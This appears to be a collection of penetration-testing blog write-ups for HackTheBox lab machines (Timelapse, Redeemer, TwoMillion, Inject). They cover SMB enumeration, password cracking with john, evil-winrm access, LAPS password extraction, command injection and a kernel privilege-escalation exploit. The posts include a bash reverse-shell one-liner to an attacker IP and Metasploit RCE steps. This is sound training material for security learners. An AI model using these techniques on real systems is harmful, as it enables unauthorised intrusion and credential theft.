And voilà!!! We’ve achieved root access on the HackTheBox ‘Analytics‘ machine, granting us the ability to effortlessly access and read the contents of root.txt.

While this machine was relatively straightforward to breach, the enumeration process turned out to be quite time-consuming. Therefore, the key lesson we learned from this experience is the importance of leaving no stone unturned.

Feel free to check out our other blogs on HackTheBox platform here.

Happy Pentesting!!!
Team CyberiumX

HackTheBox- Timelapse

Hello folks,

This blog focuses on a machine called “Timelapse” within HackTheBox. It has been classified as an easy machine. It is based on the Windows Operating System. You will be learning about Windows Enumeration and Privilege Escalation. Let’s proceed without any delay and begin the penetration testing process.

You can find the machine in the retired category of HackTheBox over here.

First of all let’s start the machine by clicking on “Join Machine” and scan the obtained IP using “NMAP”.

sudo nmap -sS <Machine_IP>

We can see that there are many ports open such as DNS (53), Kerberos (88), LDAP (389), SMB (445), etc. which confirms that this machine is a Domain controller in an Active Directory environment. Let us move further and start the enumeration process with SMB.

Firstly, we will see the available shares and their permissions with the help of smbmap tool using the following command.

smbmap -H <Machine_IP> -u “CyberiumX”

Here, I have provided any username like CyberiumX which will be treated as a guest account. We get an available share with Read permission named “Shares”

After that we can use smbclient to connect with the available share.

smbclient \\\\<Machine_IP>\\Shares

Now, we will check what content we have here on the “Shares” share using dir command. We will find some directories here, so let us visit them one by one and look for some critical files. After looking into the Dev directory we found a file named winrm_backup.zip which looks very interesting. Let’s download it using following command and look for some other important files:

get winrm_backup.zip

We got nothing special in the other directory, so let us exit from here and try to unzip the compressed file using the following command:

unzip winrm_backup.zip

We will find that there is a pfx file inside the zip file but we cannot decompress it because it requires a password. So in order to get the password of it we need to generate the password hash out of the zip file using zip2john tool as follows:

zip2john winrm_backup.zip > zip_password.txt

We have the password hash of the zip file. Now we can simply use john the ripper on our zip_password.txt file which contains the hash of the zip file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt zip_password.txt

And then we can simply decompress the file with the password we just obtained using the following command:

unzip winrm_backup.zip

It will decompress a file with the name “legacyy_dev_auth.pfx”. Here legacyy or legacyy_dev looks like a username.

Getting Foothold on Timelapse

Now using the pfx file we can generate .pem and .crt files which will help us to take access to the Windows machine using WinRM. In order to generate the pem file, we can simply use the following command: (This will require a password that we do not know. Let us check.)

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

We got an error as invalid password as we do not have access to the password of the pfx file.

Now we need to get the password hash of the pfx file using a tool named pfx2john. This tool is located at /usr/share/john. In order to get the hash, we need to copy the pfx file to /usr/share/john and then we need to run the following command:

sudo ./pfx2john.py legacyy_dev_auth.pfx > /home/CyberiumX/pfx_hash.txt

This will provide us with the hash of the pfx file. Now, we will again use john the ripper tool to get the password of the pfx file using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt pfx_hash.txt

John the ripper successfully provided us the password of pfx file and now we can finally generate pem file using the same command as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out CyberiumX_key.pem

It asked for a pass phrase which we can set of our choice.

Next, we will generate the crt file using the same tool openssl and pfx file as follows:

openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out CyberiumX_cert.crt

We can see that we have both the files here.

Now we have to generate a pem file with RSA asymmetric encryption signature because it will be used to take the remote shell using WinRM. So, we will use the following command to create it:

openssl rsa -in CyberiumX_key.pem -out CyberiumX_rsa.pem

Okay. So, now after everything we have done we will use Evilwinrm tool to get the remote access of the target machine. We will provide Machine’s IP, username as legacy, CyberiumX_rsa.pem as Key file with RSA signature and CyberiumX_cert.crt as our certificate file as follows:

evil-winrm -i <Machine_IP> -u legacyy -k CyberiumX_rsa.pem -c CyberiumX_cert.crt –S

Great!!! We got our foothold on Timelapse. We can go to User’s Desktop and look for User.txt file.

Now after trying different methods to escalate the privileges, we found password for a user named svc_deploy in the history of Powershell using following command:

cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Let’s take the access of svc_deploy user on Timelapse using Evilwinrm tool as follows:

evil-winrm –I <Machine_IP> -u svc_deploy -p ‘<password>’ -S

Privilege Escalation on Timelapse

Now, we need to find our way to get Administrative access on Timelapse.
In the Documents folder of svc_deploy user, we are getting a directory named AdmPwd.PS.

So, I researched this directory on Google and heard about LAPS (Local Administrator Password Solution) which provides a solution to manage local account passwords of domain joined computers. Hence the name of machine is Time-LAPS

You can check out the article by HackTricks about LAPS Penetration Testing.
Now let us check if the following registry is set or not:

reg query “HKLM\Software\Policies\Microsoft Services\AdmPwd” /v AdmPwdEnable

This is set on the target machine. Let us confirm that is there any group related to LAPS using the following command:

net groups /domain

So, we have a group named LAPS_Readers which is a domain group.
Now let us finally confirm whether we are a member of this group using the following command:

net groups “LAPS_Readers” /domain

Great!!! We are a member of this group. Now we need to find a way to get the password of Administrator users using LAPS.
After searching a lot on the internet I finally found one command which requires the name of the DC as an argument. So let’s first get the name of DC using the following command:

Get-AdDomainController

We will find that the name of the DC is dc01. So using this name we can now run our final command which will extract the password for the admin user and show it to us on the screen. The command is as follows:

Get-ADComputer dc01 -Properties ms-Mcs-AdmPwd

Hurray!!! We got the password of the administrator user. Let us again use evilwinrm tool to get access to the administrator user using the looted credentials. The command is as follows:

evil-winrm -i <Machine_IP> -u administrator -p ‘<password>’ –S

Yeah!!! We have administrative access here. Now we need to read the contents of root.txt file which we could not find in the Administrator directory. So I checked the Users folder and there we have another user named TRX. So, I checked the Desktop of the TRX user and there I found the root.txt file which we can read with the help of the type command.

So, this was all about the Timelapse machine by HackTheBox. We learned about some new terms here like How to get the password hash of a pfx file and how to crack it, how to get access using key and crt files, about LAPS, etc.

You can checkout out other blogs on HackTheBox machines here.

Happy Pentesting!!!

Team CyberiumX

HackTheBox- Redeemer

Hello folks,
This blog focuses on a machine with the name “Redeemer” within HackTheBox’s Starting point tier 0. It has been classified as an easy-level challenge. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the Redeemer machine.

In this writeup, we will be learning about a service called Redis which can be found in your real-life pentesting.
There are a total of 11 tasks that we have to complete. So, let’s connect to the HTB network using OpenVPN and then use nmap to scan the machine’s IP.

nmap -p- -sS <Mahine_IP>

Task 1
There is only one port open which is the answer to the first task.

Task 2
The next task asks for the name of the service that you will get from the output of Nmap scan.

Task 3
Now we need to do some research on this service using the Google Search Engine.

So we got our answer from here. Now let’s move towards the next task.

Task 4
We need to find the name of the command line tool that we can use to interact with this service. I know the name of the tool. You can also Google the same. You should know the power of how to use Search engines.

Task 5
Now, check out the help menu of the tool with the –help flag.

Task 6
Now let’s connect with the following command to the remote server.

redis-cli –h <Machine_IP>

Now we need to find the information of the Redis server for which we need to find a command using Google.

Task 7
Using the info command, let’s get the version of Redis Server.

Task 8
To select the desired database inside the Redis server, we will use the “select” command.

Task 9
Now we need to find the keys with index 0. So in the output of the Info command, there was a heading with Keyspace under which you will find the answer.

Task 10
To find or get all keys stored in the Redis server we need to run the following command:

keys *

Task 11
Now final question is to get the flag. You saw in the above output that there was a key with the name Flag. So we can simply use the “get” command followed by the key name to get the value of the specific key.

This write-up is just an overview of Redis penetration testing. HackTheBox has created this awesome room “Redeemer” for this.

Also, you can check out our other blogs on Cyber Security and Penetration Testing here.

Happy Pentesting!!!

Team CyberiumX

HackTheBox-TwoMillion

Hello folks,

This blog focuses on a machine called “TwoMillion” within HackTheBox. It has been classified as an easy machine. It is named after hitting 2 million subscribers on the HTB platform. That’s huge!!! Let’s proceed without any delay and begin the penetration process.

Click here to access the TwoMillion machine.

First of all, let’s start the machine by clicking on “Join Machine” and scan the obtained IP using “NMAP”.

nmap -sV -sC <Machine_IP>

From the above, we can see that only 2 ports are open i.e. 22 (SSH) and 80 (HTTP). When I tried browsing the website, I was redirected to a domain name “http://2million.htb/”. So, let’s add this to our Hosts file.

Let’s now try to access the HTTP service using the domain name. It looks like the old website of HTB. Cool!!!

I tried looking for links but got nothing interesting from them. There is a Login page at /login but we do not have any credentials for that.

There is another interesting page /invite that comes under the /join page after clicking on “Join HTB”.

Now after reaching this page, I remembered everything about how I created my account on HackTheBox back in 2017. At that time we do not have any option to register a new account on HackTheBox. We somehow had to hack our way to /register page. It’s like old times!!!

So, what’s the next thing to do is open inspect element and go to the Network section. After refreshing the page you can see that there is a js file “inviteapi.min.js” which is getting executed.

Go to the Debugger tab and look for the same js file and try to read the code or you can you js beautifier online to understand the code.

There is a function called “makeInviteCode()”

Now go to the Console tab and type the identified js function there i.e. “makeInviteCode()” and you will get an encoded output that can be decoded using ROT13.

Now let’s decode the ROT13 online and see what it says.

We have to make a POST request to /api/v1/invite/generate endpoint. We can do that with the help of the cURL tool as follows:

curl -X POST http://2million.htb/api/v1/invite/generate

This will generate a code which is encoded with base64. So let’s copy the code and use the base64 command to decode it.

Paste this invite code to the /invite page and you will be redirected to the /register page. Provide your details for account creation and register a new account.

So, we have successfully created our account like I did back in 2017. The next thing is to log in with the credentials which will take us to the old dashboard of HTB.

I tried to look into all the web pages, some of them are unavailable and some are like real HTB pages. After looking into all of them, I found an interesting page under “Labs” named “Access” (/home/access).

We have 2 options here “Connection Pack” and “Regenerate” and both of them returns a .ovpn file of HTB. I tried connecting with it but it doesn’t work.

The next thing that came into my mind was using Burp Suite to analyze the requests that these options are sending. After intercepting the requests, “Connection Pack” sends a GET request to /api/v1/user/vpn/generate, and “Regenerate” sends a GET to /api/v1/user/vpn/regenerate endpoints.

I checked the directory path backward using Burp Suite and found something interesting at /api/v1. It returned every single API path integrated into the website.

Here I was very curious about checking the API related to admin so I tried checking the first one with a GET request “/api/v1/admin/auth” but it returned a message as false and that was obvious as I am not an admin user.

I got nothing interesting in the POST request at “/api/v1/admin/vpn/generate” so I moved on to the final one which is a PUT request at “/api/v1/admin/settings/update” and the response was 200 but in the body there was a message as “Invalid Content Type”

So, I simply added a Content-Type header that points towards the application/JSON and sent the request. This time I got another error.

So I simply added my registered email in JSON format and sent the request. This time I got an error saying Missing parameter: is_admin. So finally I added another parameter and provided the value as 1. After sending the request, my user “CyberiumX” is now an admin user.

Now I tried validating my privileges using a GET request to “/api/v1/admin/auth” endpoint and it said True…That’s amazing, so we have escalated our privileges to admin users on the web application.

Next, I sent the POST request to “/api/v1/admin/vpn/generate” endpoint and I got a 200 status code with a message in the response as missing header “Content-Type” so I did the same as before and then got another error as missing parameter “Username”. So I added my username in the response in JSON format and got the contents of VPN file.

Now it was very hard to guess, but I thought to try Command Injection vulnerability on the same Username parameter as Bash is generally used to generate the contents of VPN files. So I tried to add a bash command with the username parameter and boommm!!! We got command injection here in the application.

Let’s try to get a reverse shell using a simple bash one-liner

bash -i >& /dev/tcp/Your_IP/1337 0>&1

And open a listener using Netcat (nc) at 1337 port using the following command:

nc -nlvp 1337

As soon as I sent the request I got a reverse shell on my Netcat. I am a www-data user.

So, we are currently in the HTML directory let’s list the contents here and see if we can find something that can help us to escalate our privilege.

There are many files and directories here. An interesting hidden file named “.env” might provide us with any information. Let’s read it.

Wooooppp!!! So, we got the password of the admin user here. Let’s use SSH to log in to the machine using the credentials. You can also use the su command to escalate your privilege to an admin user. Read out the user.txt.

Privilege Escalation on TwoMillion

Now let’s try to get a root shell. There was an interesting message when I used SSH to log in as an admin user. So, I searched for any directory related to mail and I got one under /var/mail/admin.

The mail says about a vulnerable kernel version that they might be using on the web server. They specifically mentioned Overlays/FUSE. So I searched on the internet about it and got a CVE number related to it “CVE-2023-0386”.

So, I started searching for the exploit for this CVE and got one on GitHub. The steps are also mentioned in the Readme. I downloaded the contents and uploaded the files to the victim’s machine using a Python server. You can also try the same with the Secure Copy (sc) command as well.

The readme is written in Chinese language, so I translated it and it says that we have to open two terminals. We have to type different commands on them.

On the first terminal, let’s first unzip the file and run the “make all” command. Do not worry if it gives any error.

List the contents of the directory and you will find some new binaries that are created after running the previous command.

Now, in one of the terminal sessions, type “./fuse ./ovlcap/lower ./gc” and after that in the other one type “./exp”. Soon after running the second command, you will find the root shell in the terminal.

Hurrraayyyy!!! We have successfully rooted the machine.

This was an amazing box for performing real-time penetration testing in the Cyber Security domain.

Happy Pentesting!!!

Team CyberiumX

HackTheBox- Inject

Hello folks,

This blog focuses on a machine called “Inject” within the HackTheBox platform. It has been classified as an easy-level challenge. Let’s proceed without any delay and begin the penetration testing process.

Click here to access the Inject Machine.

First of all, let’s start the Inject machine by clicking on “Join Machine”. Scan the obtained IP using our best tool “NMAP”:

nmap -sV -sC Machine_IP

From the above, we can see that only 2 ports are open i.e. 22 (SSH) and 8080 (HTTP). We cannot work on SSH, so let’s try to enumerate further on the HTTP port. Open Firefox and enter http://Machine_IP:8080

We do not have much on the website, so let’s perform directory busting using Gobuster.

gobuster dir -u http://Machine_IP:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php -t 50 2>/dev/null

Out of this directory, only Upload has something interesting. Let’s see what we have here.

I have uploaded a jpg image and it is successfully uploaded to the server. This might be vulnerable to File Upload Vulnerability.

We got another directory path where our image is uploaded and it seems vulnerable to many parameter-related web application vulnerabilities. So let’s penetrate it further…

Initial Foothold on Inject

I tried exploiting SQL, XSS and Remote file inclusion but they didn’t work here. So I went for Directory Traversal vulnerability aka Path Traversal vulnerability and it worked using Burp Suite. Let me show you how:

Wooooo!!! here we got something interesting. There are two secondary users on this machine: Frank and Phil. Let’s try to look into their home directory and see what everything we have there.

There is an interesting hidden directory there. Let’s look into it.

Yeahhhhh!!! So we got the password for Phil’s user. I tried taking SSH using it but it didn’t work so I checked the configuration file of SSH it shows that we cannot take SSH using Phil. So we need to find another way into the machine.

I enumerated further and checked all the important directories where we can get something vulnerable. There is a folder in the web root directory where we get a sensitive file named pom.xml (Project Object Model) which stores configuration details and versions of different frameworks that are used on the web server.

So I tried checking for any vulnerable versions over the internet and got two vulnerabilities discovered in 2022:

Spring Cloud Function SpEL RCE

Spring Framework Class property RCE (Spring4Shell)

I tried both but Spring4Shell was not working. Fortunately, SpEL RCE was working just fine. If you want to read out further please click here.

The Metasploit module name is exploit/multi/http/spring_cloud_function_spel_injection. We need to set RHOSTS and LHOST options and then type exploit as shown below:

Hurraayyy!!! We got our foothold on the machine as Frank users.
Let’s Spawn our shell with Python3 to make it more interactive

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

Now let’s try to switch our current user to Phil with the password we obtained.
It worked and here is our User.txt file. I respect the policies of HackTheBox and will not show the flag over here.

Privilege Escalation on Inject

Now let’s try to escalate our privilege to the root user. I tried many methods but they were not working. So I remembered one directory that I got earlier from directory traversal under /opt. It stored some Ansible files.

So I tried to look for any vulnerability on Ansible automation that might help us escalate our privileges. And here I got one. You can read it by clicking here.

We have to create a file with yml extension in the tasks folder with the following content as shown below :

Let’s now take this file to our target machine using the Python3 HTTP server with the following command:

python3 –m http.server 7777

Go to the target machine and type the following command to download the file:

wget://Your_Machine_IP:7777/playbook.yml

Now after a while, just execute the “/bin/bash –p” command to get the root shell. Booommm!!! We successfully penetrated the machine.

Inject is an easy machine by HackTheBox. You can also check out our other write-ups on HackTheBox Machines here.

Happy Pentesting!!!

Team CyberiumX

HackTheBox- BoardLight

Getting Foothold on BoardLight

Privilege Escalation on BoardLight

Getting Foothold on Headless

Privilege Escalation on Headless

Getting Foothold on Bizness

Privilege Escalation on Bizness

Getting User Access on Clicker

Privilege Escalation on Clicker

Getting Foothold on Analytics

Privilege escalation on Analytics

Getting Foothold on Timelapse

Privilege Escalation on Timelapse

Privilege Escalation on TwoMillion

Initial Foothold on Inject

Privilege Escalation on Inject

Book a Demo